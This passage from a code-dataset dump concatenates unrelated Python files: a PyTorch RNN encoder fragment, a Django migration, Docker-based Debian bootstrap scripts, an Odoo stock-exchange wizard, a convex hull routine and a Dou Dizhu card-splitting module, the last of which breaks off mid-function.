batch_first=True,
dropout=0.0,
bidirectional=True
)
self.dense = nn.Linear(
2 * cfg.h_units,
cfg.h_units,
bias=True
)
self.drop = nn.Dropout(cfg.dropout)
self.param_init()
self.embeddings()
return
def param_init(self):
for name, param in self.named_parameters():
if 'bias' in name:
init.constant(param, 0.0)
if 'weight' in name:
init.xavier_uniform(param)
return
def embeddings(self):
"""Add embedding layer that maps from ids to vectors."""
cfg = self.cfg
src_lt = torch.FloatTensor(cfg.data['src_vec']) #source lookup table
self.src_em = nn.Embedding(cfg.src_alphabet_size, cfg.src_em_size)
self.src_em.weight.data.copy_(src_lt)
self.src_em.weight.data[cfg.src_pad_id].fill_(0.0)
self.src_em.weight.requires_grad = True
return
def forward(self):
cfg = self.cfg
#zero the pad id vectors
self.src_em.weight.data[cfg.src_pad_id].fill_(0.0)
x_mask = Variable(cfg.B['x_mask'].cuda()) if hasCuda else Variable(cfg.B['x_mask'])
#Tensor to Input Variables
x = Variable(cfg.B['x'].cuda()) if hasCuda else Variable(cfg.B['x'])
#Create a variable for initial hidden vector of RNNs.
zeros = torch.zeros(2, cfg.d_batch_size, cfg.h_units)
h0 = Variable(zeros.cuda()) if hasCuda else Variable(zeros)
x_ems = self.src_em(x)
#Bi-directional RNN
outputs, _ = self.src_rnn(x_ems, (h0, h0))
outputs_dr = self.drop(outputs)
HH = self.dense(outputs_dr)
#tanh non-linear layer.
H = nn.functional.tanh(HH)
#H is the final matrix having final hidden vectors of steps.
return H * x_mask.view(-1, cfg.max_length, 1).expand(-1, cfg.max_length, cfg.h_units)
| StarcoderdataPython |
6622120 | <filename>python3/koans/a_package_folder/__init__.py
#!/usr/bin/env python
an_attribute = 1984 | StarcoderdataPython |
11335699 | <filename>tests/__init__.py<gh_stars>0
"""Unit test package for smartgarden_x."""
| StarcoderdataPython |
4853700 | import glob
import os
import shutil
srcdir = r'D:\dong\wafer-data\data_bmp'
seldir = r'C:\Users\user\PycharmProjects\yolov3\VOC2007\Annotations'
dstdir = r'C:\Users\user\PycharmProjects\yolov3\VOC2007\JPEGImages'
file_props = glob.glob(seldir + '/*.xml')
for filename in file_props:
basename = os.path.basename(filename)
bmp_name = basename[:-3] + 'bmp'
srcfile = srcdir + '/' + bmp_name
dstfile = dstdir + '/' + bmp_name
print(srcfile)
shutil.copy(srcfile, dstfile)
| StarcoderdataPython |
3429457 | <gh_stars>0
# Generated by Django 3.0.4 on 2020-04-19 01:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0005_remove_category_status'),
]
operations = [
migrations.CreateModel(
name='Tab',
fields=[
('id', models.BigAutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=254)),
('index', models.SmallIntegerField(default=1)),
('date', models.DateTimeField(auto_now_add=True)),
],
options={
'db_table': 'blog_tab',
},
),
]
| StarcoderdataPython |
11363372 | <filename>seine/bootstrap.py
# seine - Singular Embedded Images Now Easy
# SPDX-License-Identifier Apache-2.0
from abc import ABC, abstractmethod
import os
import subprocess
import tempfile
from seine.utils import ContainerEngine
class Bootstrap(ABC):
def __init__(self, distro, options):
self._name = None
self.distro = distro
self.options = options
super().__init__()
@abstractmethod
def create(self):
pass
@abstractmethod
def defaultName(self):
pass
def getName(self):
if self._name is None:
self._name = self.defaultName()
return self._name
def setName(self, name):
self._name = name
name = property(getName, setName)
class HostBootstrap(Bootstrap):
def create(self):
equivsfile = tempfile.NamedTemporaryFile(mode="w", delete=False)
equivsfile.write(EQUIVS_CONTROL_FILE)
equivsfile.close()
dockerfile = tempfile.NamedTemporaryFile(mode="w", delete=False)
dockerfile.write(HOST_BOOTSTRAP_SCRIPT.format(
self.distro["source"],
self.distro["release"],
os.path.basename(equivsfile.name)))
dockerfile.close()
try:
ContainerEngine.run([
"build", "--rm", "--squash",
"-t", self.name, "-f", dockerfile.name,
"-v", "/tmp:/host-tmp:ro"],
check=True)
except subprocess.CalledProcessError:
raise
finally:
ContainerEngine.run(["image", "prune", "-f"])
os.unlink(dockerfile.name)
os.unlink(equivsfile.name)
return self
def defaultName(self):
return os.path.join("bootstrap", self.distro["source"], self.distro["release"], "all")
class TargetBootstrap(Bootstrap):
def create(self, hostBootstrap):
self.hostBootstrap = hostBootstrap
dockerfile = tempfile.NamedTemporaryFile(mode="w", delete=False)
dockerfile.write(TARGET_BOOTSTRAP_SCRIPT.format(
self.hostBootstrap.name,
self.distro["architecture"],
self.distro["release"],
self.distro["uri"]
))
dockerfile.close()
try:
ContainerEngine.run([
"build", "--rm",
"-t", self.name,
"-f", dockerfile.name], check=True)
except subprocess.CalledProcessError:
raise
finally:
ContainerEngine.run(["image", "prune", "-f"])
os.unlink(dockerfile.name)
return self
def defaultName(self):
return os.path.join(
"bootstrap",
self.distro["source"],
self.distro["release"],
self.distro["architecture"])
HOST_BOOTSTRAP_SCRIPT = """
FROM {0}:{1} AS base
RUN \
apt-get update -qqy && \
apt-get install -qqy --no-install-recommends \
debootstrap equivs qemu-user-static && \
mkdir -p /opt/seine && \
cd /opt/seine && \
equivs-build /host-tmp/{2} && \
apt-get autoremove -qqy equivs && \
apt-get clean -qqy
FROM base AS clean-base
RUN rm -rf /usr/share/doc \
/usr/share/info \
/usr/share/man
"""
TARGET_BOOTSTRAP_SCRIPT = """
FROM {0} AS bootstrap
RUN \
export container=lxc; \
qemu-debootstrap --variant=minbase --arch {1} {2} rootfs {3} && \
cp /usr/bin/qemu-*-static rootfs/usr/bin/ && \
echo 'APT::Install-Recommends "false";' \
>rootfs/etc/apt/apt.conf.d/00-no-recommends && \
echo 'APT::Install-Suggests "false";' \
>rootfs/etc/apt/apt.conf.d/00-no-suggests
FROM scratch AS base
COPY --from=bootstrap rootfs/ /
RUN apt-get clean -qqy && \
rm -rf /usr/share/doc /usr/share/info /usr/share/man
"""
EQUIVS_CONTROL_FILE = """
Section: misc
Priority: optional
Standards-Version: 3.9.2
Package: seine-ansible
Depends: ansible, python3-apt
Architecture: all
Description: dependencies for seine
"""
| StarcoderdataPython |
1812418 | <reponame>umar3ziz/bloopark
# -*- coding: utf-8 -*-
#################################################################################
# Author : <NAME> <<EMAIL>>
# Copyright(c): Developer -<NAME>-
# All Rights Reserved.
#
# This program is copyright property of the author mentioned above.
# You can`t redistribute it and/or modify it.
#################################################################################
""" Wizards to enable Exchanges"""
from odoo import api, fields, models, _
from odoo.addons import decimal_precision as dp
from odoo.exceptions import UserError
from odoo.tools.float_utils import float_round, float_is_zero
class StockExchangeLine(models.TransientModel):
_name = "stock.exchange.line"
_rec_name = 'product_id'
_description = 'Exchange Picking Line'
product_id = fields.Many2one(
'product.product', string="Product",
required=True, domain="[('id', '=', product_id)]"
)
exchange_product_id = fields.Many2one(
'product.product', string="Exchange Product",
required=False, domain="[('id', '!=', product_id)]"
)
quantity = fields.Float(
"Quantity", digits=dp.get_precision('Product Unit of Measure'), required=True
)
price_unit = fields.Float(
string='Unit Price', required=False,
digits=dp.get_precision('Product Price')
)
currency_id = fields.Many2one('res.currency')
price_subtotal = fields.Monetary(
compute='_compute_amount',
string='Subtotal',
readonly=True, store=True
)
uom_id = fields.Many2one('uom.uom', string='Unit of Measure')
exchange_id = fields.Many2one('stock.exchange', string="Wizard")
move_id = fields.Many2one('stock.move', "Move")
@api.depends('quantity', 'price_unit')
def _compute_amount(self):
"""
Compute the subtotal to be able to compare the exchanged prices.
"""
for line in self:
line.update({
'price_subtotal': line.price_unit * line.quantity,
})
@api.onchange('exchange_product_id')
def _onchange_exchange_product(self):
""" Onchange exchange_product_id to get line values """
values = {
'quantity': False,
'price_unit': False,
'uom_id': False,
}
line = self.move_id.sale_line_id or self.move_id.purchase_line_id
if self.exchange_product_id:
values.update({
'quantity': self.move_id.product_uom_qty,
'price_unit': self.exchange_product_id.lst_price,
'uom_id': self.exchange_product_id.uom_id.id,
})
else:
values.update({
'quantity': self.move_id.product_uom_qty,
'price_unit': line.price_unit,
'uom_id': line.product_uom.id,
})
self.update(values)
class StockExchange(models.TransientModel):
_name = 'stock.exchange'
_description = 'Delivery Exchange'
picking_id = fields.Many2one('stock.picking')
exchange_line_ids = fields.One2many('stock.exchange.line', 'exchange_id', 'Moves')
location_id = fields.Many2one(
'stock.location', 'Exchange Location',
domain="['|', ('exchange_location', '=', True), ('return_location', '=', True)]"
)
@api.model
def default_get(self, fields):
"""
Override to set default values for the new exchange lines
"""
if len(self.env.context.get('active_ids', list())) > 1:
raise UserError(_("You may only exchange one picking at a time."))
res = super(StockExchange, self).default_get(fields)
exchange_line_ids = []
picking = self.env['stock.picking'].browse(self.env.context.get('active_id'))
if picking:
res.update({'picking_id': picking.id})
if picking.state != 'done':
raise UserError(_("You may only exchange Done pickings."))
for move in picking.move_lines:
if move.scrapped or move.exchanged:
continue
quantity = move.product_qty - sum(
move.move_dest_ids.filtered(
lambda m: m.state in ['partially_available', 'assigned', 'done']
).mapped('move_line_ids').mapped('product_qty')
)
quantity = float_round(
quantity, precision_rounding=move.product_uom.rounding
)
# exchange should be from sale or purchase
line = move.sale_line_id or move.purchase_line_id
if line:
exchange_line_ids.append(
(0, 0, {
'product_id': move.product_id.id,
'quantity': quantity,
'move_id': move.id,
'price_unit': line.price_unit,
'uom_id': move.product_uom.id,
'price_subtotal': quantity * line.price_unit,
'currency_id': line.currency_id.id
})
)
if not exchange_line_ids:
raise UserError(_(
"No products to exchange (only lines in Done state and not fully "
"exchanged yet can be exchange)."
))
if 'exchange_line_ids' in fields:
res.update({'exchange_line_ids': exchange_line_ids})
if 'location_id' in fields:
location_id = picking.location_id.id
exchange_picking_type = picking.picking_type_id.exchange_picking_type_id
dest_location = exchange_picking_type.default_location_dest_id
if dest_location.exchange_location:
location_id = dest_location.id
res['location_id'] = location_id
return res
def _prepare_move_default_values(self, exchange_line, new_picking):
"""
Prepare new move line dict values
:param exchange_line: move related Exchange line obj
:param new_picking: Obj of the new created picking
:return: Dict of values
"""
product = exchange_line.exchange_product_id or exchange_line.product_id
location = self.location_id or exchange_line.move_id.location_id
vals = {
'product_id': product.id,
'product_uom_qty': exchange_line.quantity,
'product_uom': exchange_line.uom_id.id,
'picking_id': new_picking.id,
'state': 'draft',
'date_expected': fields.Datetime.now(),
'location_id': exchange_line.move_id.location_dest_id.id,
'location_dest_id': location.id,
'picking_type_id': new_picking.picking_type_id.id,
'warehouse_id': self.picking_id.picking_type_id.warehouse_id.id,
'origin_exchange_move_id': exchange_line.move_id.id,
'procure_method': 'make_to_stock',
}
return vals
def _create_exchanges(self):
"""
To finalize data and create the Exchanged picking and Invoices if necessary
:return: Int of the new created picking ID, Int of the picking type ID
"""
# create new picking for exchanged products
if self.picking_id.picking_type_id.exchange_picking_type_id:
picking_type_id = self.picking_id.picking_type_id.exchange_picking_type_id.id
elif self.picking_id.picking_type_id.return_picking_type_id:
picking_type_id = self.picking_id.picking_type_id.return_picking_type_id.id
else:
picking_type_id = self.picking_id.picking_type_id.id
moves = self.picking_id.move_ids_without_package
purchase_lines = moves.mapped('purchase_line_id')
purchase_order = purchase_lines.mapped('order_id')
new_picking = self.picking_id.copy({
'move_lines': [],
'sale_id': False,
'picking_type_id': picking_type_id,
'exchange_sale_id': self.picking_id.sale_id.id,
'exchange_purchase_id': purchase_order and purchase_order[0].id,
'state': 'draft',
'origin': _("Exchange of %s") % self.picking_id.name,
'location_id': self.picking_id.location_dest_id.id,
'location_dest_id': self.location_id.id
})
new_picking.message_post_with_view(
'mail.message_origin_link', values={
'self': new_picking, 'origin': self.picking_id
}, subtype_id=self.env.ref('mail.mt_note').id
)
exchanged_lines = 0
invoices_values = []
for exchange_line in self.exchange_line_ids:
if not exchange_line.move_id:
raise UserError(_(
"You have manually created product lines, "
"please delete them to proceed."
))
if not float_is_zero(
exchange_line.quantity,
precision_rounding=exchange_line.uom_id.rounding
):
exchanged_lines += 1
vals = self._prepare_move_default_values(exchange_line, new_picking)
move = exchange_line.move_id.copy(vals)
exchange_line.move_id.exchanged = True
val = {'exchange_move_id': move.id}
line = move.sale_line_id or move.purchase_line_id
invoice_value = self._prepare_invoice_lines(exchange_line, line)
if invoice_value:
invoices_values.append(invoice_value)
line.write(val)
if not exchanged_lines:
raise UserError(_("Please specify at least one non-zero quantity."))
if invoices_values:
self.action_create_invoices(invoices_values)
new_picking.action_confirm()
new_picking.action_assign()
return new_picking.id, picking_type_id
def _prepare_invoice_lines(self, exchange_line, order_line):
"""
Prepare new invoice lines dict values
:param exchange_line: move related Exchange line obj
:param order_line: Obj of Sale or purchase line the related to this invoice line
:return: Dict of values
"""
invoice_type = {
'sale.order.line': {
'higher': 'out_invoice', 'lower': 'out_refund',
'type': 'sale', 'field': 'exchange_sale_line_id'
},
'purchase.order.line': {
'higher': 'in_invoice', 'lower': 'in_refund',
'type': 'purchase', 'field': 'exchange_purchase_line_id'
},
}
product = exchange_line.exchange_product_id or exchange_line.product_id
data = {
'invoice_type': False,
'values': {
'product_id': product.id,
'quantity': exchange_line.quantity,
'name': 'Exchange for [%s]' % exchange_line.product_id.display_name,
}
}
if exchange_line.exchange_product_id or \
exchange_line.price_subtotal > order_line.price_subtotal:
data['invoice_type'] = invoice_type[order_line._name]['higher']
elif exchange_line.price_subtotal < order_line.price_subtotal:
data['invoice_type'] = invoice_type[order_line._name]['lower']
else:
return {}
data[invoice_type[order_line._name]['type']] = order_line.order_id
data['values'][invoice_type[order_line._name]['field']] = order_line.id
data['values']['price_unit'] = exchange_line.price_unit
# TODO i think we should take the different between prices NOT the all price
# abs(exchange_line.price_unit - order_line.price_unit)
return data
@api.multi
def action_create_invoices(self, data):
"""
Clean the incoming data and specify each line with its invoice types
:param data: list of values that needed to create invoice lines
:return: None
"""
invoice_obj = self.env['account.invoice']
values = {}
for val in data:
values.setdefault(val['invoice_type'], {
'order': val.get('sale', val.get('purchase')),
'values': []
})
values[val['invoice_type']]['values'].append((0, 0, val['values']))
for inv_type, inv_data in values.items():
invoice = invoice_obj.new(self._prepare_invoice(inv_type))
invoice._onchange_partner_id()
inv = invoice._convert_to_write({
name: invoice[name] for name in invoice._cache
})
for _, _, line in inv_data['values']:
line['account_id'] = inv['account_id']
inv['invoice_line_ids'] = inv_data['values']
new_invoice = invoice_obj.sudo().create(inv)
new_invoice.action_invoice_open()
inv_data['order'].write({
'exchange_invoice_ids': [(4, new_invoice.id)]
})
def _prepare_invoice(self, invoice_type):
"""
Prepare the dict of values to create the new invoice for a Exchange move.
"""
return {
'partner_id': self.picking_id.partner_id.id,
'company_id': self.picking_id.company_id.id,
'type': invoice_type,
'name': _('Exchange Inv for %s') % self.picking_id.name,
'currency_id': self.env.user.company_id.currency_id.id,
}
def create_exchanges(self):
"""
:return: Action for the final exchange Picking
"""
for wizard in self:
new_picking_id, pick_type_id = wizard._create_exchanges()
# Override the context to disable all the potential filters
# that could have been set previously
ctx = dict(self.env.context)
ctx.update({
'search_default_picking_type_id': pick_type_id,
'search_default_draft': False,
'search_default_assigned': False,
'search_default_confirmed': False,
'search_default_ready': False,
'search_default_late': False,
'search_default_available': False,
})
return {
'name': _('Exchanged Picking'),
'view_type': 'form',
'view_mode': 'form,tree,calendar',
'res_model': 'stock.picking',
'res_id': new_picking_id,
'type': 'ir.actions.act_window',
'context': ctx,
}
| StarcoderdataPython |
290756 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Distributed under terms of the MIT license.
# Copyright 2021 <NAME>.
import sys
import numpy as np
import matplotlib.pyplot as plt
# Function to know if we have a CCW turn
def RightTurn(p1, p2, p3):
if (p3[1] - p1[1]) * (p2[0] - p1[0]) >= (p2[1] - p1[1]) * (p3[0] - p1[0]):
return False
return True
# Main algorithm:
def GrahamScan(P):
P.sort() # Sort the set of points
L_upper = [P[0], P[1]] # Initialize upper part
# Compute the upper part of the hull
for i in range(2, len(P)):
L_upper.append(P[i])
while len(L_upper) > 2 and not RightTurn(L_upper[-1], L_upper[-2], L_upper[-3]):
del L_upper[-2]
L_lower = [P[-1], P[-2]] # Initialize the lower part
# Compute the lower part of the hull
for i in range(len(P) - 3, -1, -1):
L_lower.append(P[i])
while len(L_lower) > 2 and not RightTurn(L_lower[-1], L_lower[-2], L_lower[-3]):
del L_lower[-2]
del L_lower[0]
del L_lower[-1]
L = L_upper + L_lower # Build the full hull
return np.array(L)
def main():
# try:
# N = int(sys.argv[1])
# except:
# N = int(input("Introduce N: "))
N = 100
# By default we build a random set of N points with coordinates in [0,300)x[0,300):
P = [(np.random.randint(0, 300), np.random.randint(0, 300)) for i in range(N)]
L = GrahamScan(P)
P = np.array(P)
# Plot the computed Convex Hull:
plt.figure()
plt.plot(L[:, 0], L[:, 1], 'b-', picker=5)
plt.plot([L[-1, 0], L[0, 0]], [L[-1, 1], L[0, 1]], 'b-', picker=5)
plt.plot(P[:, 0], P[:, 1], ".r")
plt.axis('off')
plt.show()
if __name__ == '__main__':
main() | StarcoderdataPython |
9785615 | # -*- coding: utf-8 -*-
"""
斗地主拆牌模块
@author 江胤佐
"""
from __future__ import annotations
import math
from abc import ABCMeta
from collections import defaultdict
from copy import deepcopy
from functools import cmp_to_key
from typing import Optional
from duguai.card.cards import *
from duguai.card.cards import card_lt2, card_split
from duguai.card.combo import Combo
"""顺子/连对/最小的长度"""
KIND_TO_MIN_LEN = {1: 5, 2: 3}
MAX_Q = 10000
def _most_value(x):
return np.argmax(np.bincount(x))
MAX_VALUE_CMP = cmp_to_key(lambda x, y: max(x) - max(y))
MOST_VALUE_CMP = cmp_to_key(lambda x, y: _most_value(x) - _most_value(y))
class AbstractDecomposer(metaclass=ABCMeta):
"""
拆牌类。该类只负责拆出较好的牌组,不考虑其它玩家手牌的情况。
状态(state)表示目前的手牌。
动作(action)表示待出的牌。
Q值:状态-动作的价值,Q(s, a)值越大,则越要在状态s下采取行动a.
q = d(next_state) + len(a)
"""
@classmethod
def decompose_value(cls, card_after: np.ndarray) -> int:
"""
获取一副牌的分解值
"""
if len(card_after) == 0:
return 0
card_after = card_lt2(card_after)
di, d_value, _ = card_to_suffix_di(card_after)
# 顺子/连对
for t in range(1, 3):
max_len = max(len(i) for i in card_split(di[t]))
if max_len >= KIND_TO_MIN_LEN[t]:
d_value = max(d_value, t * max_len)
return d_value
@classmethod
def _delta_q(cls, _max_q, _q):
return (_max_q - _q) if _max_q - _q < 1000 else (_max_q - MAX_Q + 1 - _q)
def _calc_q(self, lt2_state: np.ndarray, actions: np.ndarray[np.ndarray]) -> np.ndarray:
"""对每一种状态-动作计算其Q"""
result = []
for a in actions:
reward: int = 0
# 拆炸弹的惩罚值,保证在 5 5 5 5 6的情况下拆出炸弹而非三带一
for card in a:
if np.sum(lt2_state == card) == 4 and len(a) < 4:
reward = -1
break
next_state: np.ndarray = get_next_state(lt2_state, a)
if next_state.size > 0:
d_value = self.decompose_value(next_state)
result.append(d_value + reward + len(a))
else:
# 该动作打完就没牌了,故d值为最大值
result.append(MAX_Q + reward + len(a))
return np.array(result)
def _eval_actions(self,
func,
lt2_state: np.ndarray,
**kwargs) -> Tuple[np.ndarray, np.ndarray]:
actions = np.array(
func(lt2_state, kwargs['length']) if 'card_list' not in kwargs.keys() else func(kwargs['card_list'],
kwargs['kind'],
kwargs['length']))
# q = d(next state) + len(a)
# 计算lt2_state下每一个action的q值
q_list: np.ndarray = self._calc_q(lt2_state, actions)
if len(q_list) == 0:
return np.array([], dtype=int), np.array([], dtype=int)
return actions, q_list
def _process_card(self, card: np.ndarray):
# 将手牌分解成不连续的部分
self._lt2_cards, eq2_cards, self._ghosts = card_lt2_two_g(card)
self._lt2_states: List[np.ndarray] = card_split(self._lt2_cards)
self.card2_count: int = len(eq2_cards)
def _get_all_actions_and_q_lists(self, lt2_state: np.ndarray) -> int:
"""获取一个lt2_state下所有的actions及其对应的q_lists"""
di, max_count, max_card_value = card_to_suffix_di(lt2_state)
# solo pair trio bomb plane other
self._actions = [[], [], [], [], [], []]
self._q_lists = [np.array([], dtype=int), np.array([], dtype=int), np.array([], dtype=int),
np.array([], dtype=int), np.array([], dtype=int), np.array([], dtype=int)]
# solo pair trio bomb
for i in range(1, 5):
self._actions[i - 1], self._q_lists[i - 1] = self._eval_actions(_get_single_actions, lt2_state, length=i)
# plane
for length in range(3, len(di[3]) + 1):
seq_actions, seq_q_list = self._eval_actions(_get_seq_actions,
lt2_state,
card_list=di[3],
kind=3,
length=length)
self._actions[4].extend(seq_actions)
self._q_lists[4] = np.concatenate([self._q_lists[4], seq_q_list])
# 拆出顺子、连对
for k, min_len in KIND_TO_MIN_LEN.items():
card_list = di[k]
for length in range(min_len, len(card_list) + 1):
seq_actions, seq_q_list = self._eval_actions(_get_seq_actions,
lt2_state,
card_list=card_list,
kind=k,
length=length)
self._actions[5].extend(seq_actions)
self._q_lists[5] = np.concatenate([self._q_lists[5], seq_q_list])
max_q = 0
for q_list in self._q_lists:
if q_list.size:
max_q = max(np.max(q_list), max_q)
return max_q
class FollowDecomposer(AbstractDecomposer):
"""
跟牌拆牌器
"""
def __init__(self):
self._output: Optional[List[np.ndarray]] = None
# 存放带牌的列表
self._take_lists: Optional[Dict[int, List[np.ndarray]]] = None
# 存放主牌的列表
self._main_lists: Optional[Dict[int, List[np.ndarray]]] = None
# 存放主牌+带牌的列表
self._main_take_lists: Optional[Dict[int, List[np.ndarray]]] = None
# 炸弹列表
self._bomb_list: Optional[List[np.ndarray]] = None
# 仅维护主牌大小
self._max_combo: Optional[Combo] = None
self._last_combo: Optional[Combo] = None
self._main_kind: Optional[int] = None
self._take_kind: Optional[int] = None
def _add_bomb(self, bomb_list: list) -> None:
"""添加炸弹"""
self._bomb_list: List[np.ndarray] = []
# 添加王炸
if len(self._ghosts) == 2:
self._bomb_list.append(self._ghosts)
# 添加4个2炸弹
if self.card2_count == 4:
self._bomb_list.append(np.array([CARD_2] * 4))
if self._last_combo.is_bomb():
for card in bomb_list:
if card > self._last_combo.value:
self._bomb_list.append(np.array([card, card, card, card]))
else:
for card in bomb_list:
self._bomb_list.append(np.array([card, card, card, card]))
def _add_valid_ghost(self):
"""加入单只王。在此之前先加入2"""
if self._ghosts.size:
if self._last_combo.is_solo() \
and self._last_combo.main_kind == 1 and self._last_combo.value < self._ghosts[-1]:
self._main_lists[2].append(self._ghosts[-1:])
self._max_combo.cards = self._ghosts[-1:]
elif self._max_combo.take_kind == 1:
self._take_lists[2].append(self._ghosts[-1:])
def _add_valid_card2(self):
"""加入合法的2,之后再加入王"""
if self.card2_count:
if self._last_combo.is_single() \
and self._last_combo.main_kind <= self.card2_count and self._last_combo.value < CARD_2:
self._main_lists[self._max_combo.main_kind].append(np.array([CARD_2] * self._max_combo.main_kind))
self._max_combo.cards = [CARD_2] * self._max_combo.main_kind
if self._last_combo.take_kind <= self.card2_count:
# 2的价值比正常牌+1
self._take_lists[self._last_combo.take_kind + 1].append(np.array([CARD_2] * self._last_combo.take_kind))
def __merge_takes_to_main_seq(self, main_q: int, main_seq: np.ndarray, take_count: int) -> Tuple[int, np.ndarray]:
tk = 0
main_takes: np.ndarray = np.array(main_seq)
total_delta_q = main_q
# 从小到大遍历_take_lists,保证先合并最佳takes
for delta_q, take_list in sorted(self._take_lists.items()):
for take in take_list:
if take[0] not in main_seq:
tk += 1
total_delta_q += delta_q
main_takes = np.concatenate((main_takes, take))
if tk == take_count:
return total_delta_q, main_takes
return 0, np.array([])
def _merge_valid_main_takes(self) -> None:
"""将合法的主牌和带牌拼接起来"""
# 非炸弹是3带1单/1对,炸弹是4带2
take_count = self._last_combo.seq_len
if self._last_combo.main_kind == 4:
take_count *= 2
self._main_take_lists = defaultdict(list)
for take_list in self._take_lists.values():
take_list.sort(key=MAX_VALUE_CMP)
if self._main_lists:
# 挑选最佳的main_list,并排序
main_q = min(self._main_lists.keys())
self._main_lists[main_q].sort(key=MAX_VALUE_CMP)
for main_seq in self._main_lists[main_q]:
total_delta_q, main_takes = self.__merge_takes_to_main_seq(main_q, main_seq, take_count)
if main_takes.size > 0:
# 将得到的main_takes根据价值好坏加入相应的列表中
self._main_take_lists[total_delta_q].append(main_takes)
# 得到最大的main_takes
self._max_main_takes = self.__merge_takes_to_main_seq(0, self._max_combo.cards, take_count)[1]
def _update_main_lists_and_find_max(self, a: np.ndarray, q: int, max_q: int) -> None:
"""在action有效的情况下加入到主列表,并更新最大值"""
main_kind = self._last_combo.main_kind
seq_len = self._last_combo.seq_len
value = self._last_combo.value
combo = Combo()
combo.cards = a
# 筛选符合规则的主牌
if combo.value > value and combo.main_kind == main_kind and combo.seq_len == seq_len:
self._main_lists[self._delta_q(max_q, q)].append(a)
# 仅对比主牌大小,不关心是否带了牌
if combo.value > self._max_combo.value:
self._max_combo = deepcopy(combo)
def _best_main_takes(self):
if not self._main_take_lists:
return 0, []
min_delta_q = min(self._main_take_lists.keys())
self._main_take_lists[min_delta_q].sort(key=MOST_VALUE_CMP)
return min_delta_q, self._main_take_lists[min_delta_q]
def _append_takes(self, length: int, kind: int, max_q):
for a, q in zip(self._actions[kind - 1], self._q_lists[kind - 1]):
self._take_lists[self._delta_q(max_q, q)].append(a[:length])
def _add_valid_lt2_actions(self):
for lt2_state in self._lt2_states:
if lt2_state.size > 0:
max_q: int = super(FollowDecomposer, self)._get_all_actions_and_q_lists(lt2_state)
# 把单或者对加入_take_lists,对子可以视为2个单加入take列表
if self._take_kind == 1:
self._append_takes(1, 1, max_q)
self._append_takes(1, 2, max_q)
elif self._take_kind == 2:
self._append_takes(2, 2, max_q)
for actions, q_list in zip(self._actions, self._q_lists):
for a, q in zip(actions, q_list):
# 将合法的action加入到_main_lists,同时更新最大的main_kind
self._update_main_lists_and_find_max(a, q, max_q)
def _thieve_valid_actions(self) -> Tuple[int, List[np.ndarray]]:
"""根据last combo的限制,筛选出有效且较好的动作"""
self._add_valid_card2()
self._add_valid_ghost()
self._add_valid_lt2_actions()
if not self._main_lists:
return 0, []
if self._take_kind:
self._merge_valid_main_takes()
return self._best_main_takes()
else:
self._max_main_takes = self._max_combo.cards
min_delta_q = min(self._main_lists.keys())
self._main_lists[min_delta_q].sort(key=MAX_VALUE_CMP)
return min_delta_q, self._main_lists[min_delta_q]
def _init(self, last_combo: Combo):
# 初始化,key代表max_q - q,key越小拆得越好,越要优先选择
self._take_lists: Dict[int, List[np.ndarray]] = defaultdict(list)
self._main_lists: Dict[int, List[np.ndarray]] = defaultdict(list)
self._output = []
# max_combo仅保留主要部分,忽略带的部分
self._max_combo = deepcopy(last_combo)
self._max_main_takes = self._max_combo.cards
self._last_combo = last_combo
self._main_kind = self._max_combo.main_kind
self._take_kind = self._max_combo.take_kind
def get_good_follows(self, state: np.ndarray, last_combo: Combo) \
-> Tuple[List[np.ndarray], int, List[np.ndarray], np.ndarray]:
"""
尽量给出较好的跟牌行动。
@param state: 当前手牌。
@param last_combo: 上一次出牌
@return: 四元组:炸弹, 最好的组合 - 最好的跟牌(数字越大越不应该这样拆牌), 好的出牌的数组, 最大的出牌
"""
if last_combo.is_rocket():
return [], 0, [], np.array([], dtype=int)
self._process_card(state)
self._init(last_combo)
min_delta_q, self._output = self._thieve_valid_actions()
self._add_bomb(card_to_di(self._lt2_cards)[0][4])
self._max_combo.cards = self._max_main_takes
return self._bomb_list, min_delta_q, self._output, (
self._max_main_takes if self._max_combo > last_combo else np.array([], dtype=int))
class PlayHand:
"""
出牌时,根据d_actions对手牌进行进一步分类
"""
def __init__(self, min_solo: int, max_solo: int):
"""
初始化Hand类
@see PlayDecomposer
"""
# solo pair trio bomb
self._singles: List[List[np.ndarray]] = [[], [], [], []]
self._planes: List[np.ndarray] = []
self._trios_take: List[np.ndarray] = []
self._planes_take: List[np.ndarray] = []
self._bombs_take: List[np.ndarray] = []
self._seq_solo5: List[np.ndarray] = []
self._other_seq: List[np.ndarray] = []
self._has_rocket: bool = False
self._min_solo: int = min_solo
self._max_solo: int = max_solo
def add_to_hand(self, card_lists: List[Dict[int, List[np.ndarray]]]):
"""将各种类型牌加入到PlayHand中"""
for i in range(4):
if card_lists[i].keys():
min_delta_q = min(card_lists[i].keys())
self._singles[i] = card_lists[i][min_delta_q]
self._singles[i].sort(key=MAX_VALUE_CMP)
# plane
if card_lists[4].keys():
min_delta_q = min(card_lists[4].keys())
self._planes = card_lists[4][min_delta_q]
self._planes.sort(key=MAX_VALUE_CMP)
if card_lists[5].keys():
min_delta_q = min(card_lists[5].keys())
for action in card_lists[5][min_delta_q]:
if action.size == 5:
self._seq_solo5.append(action)
else:
self._other_seq.append(action)
self._seq_solo5.sort(key=MAX_VALUE_CMP)
self._merge_main_takes(self._planes, self._planes_take)
self._merge_main_takes(self._singles[2], self._trios_take)
self._merge_main_takes(self._singles[3], self._bombs_take)
i = 0
while i < len(self._bombs_take):
if self._bombs_take[i].size <= 4:
del self._bombs_take[i]
else:
i += 1
@staticmethod
def _choose_takes(take_list: List[np.ndarray], main_part: np.ndarray, take_count: int, split_pair: bool = False):
main_part = np.concatenate([main_part] + take_list[:take_count])
if split_pair:
main_part = np.concatenate([main_part, take_list[take_count][:1]])
return main_part
def _merge_main_takes(self, main_list: List[np.ndarray], extended_target: List[np.ndarray]):
"""
合并主要部分与带的牌
"""
main_take_list: List[np.ndarray] = []
for main_part in main_list:
# 防止main part带上自己的部分,例如 7 7 7不能带7
temp_pairs: List[np.ndarray] = [i for i in self._singles[1] if i[0] not in np.unique(main_part)]
temp_solos: List[np.ndarray] = [i for i in self._singles[0] if
i[0] not in np.unique(main_part) and i[0] not in np.unique(temp_pairs)]
take_count: int = math.ceil(main_part.size / 3)
if len(temp_solos) >= take_count and len(temp_pairs) >= take_count:
if np.mean(temp_solos) > np.mean(temp_pairs):
main_take_list.append(self._choose_takes(temp_solos, main_part, take_count))
else:
main_take_list.append(self._choose_takes(temp_pairs, main_part, take_count))
elif len(temp_pairs) >= take_count:
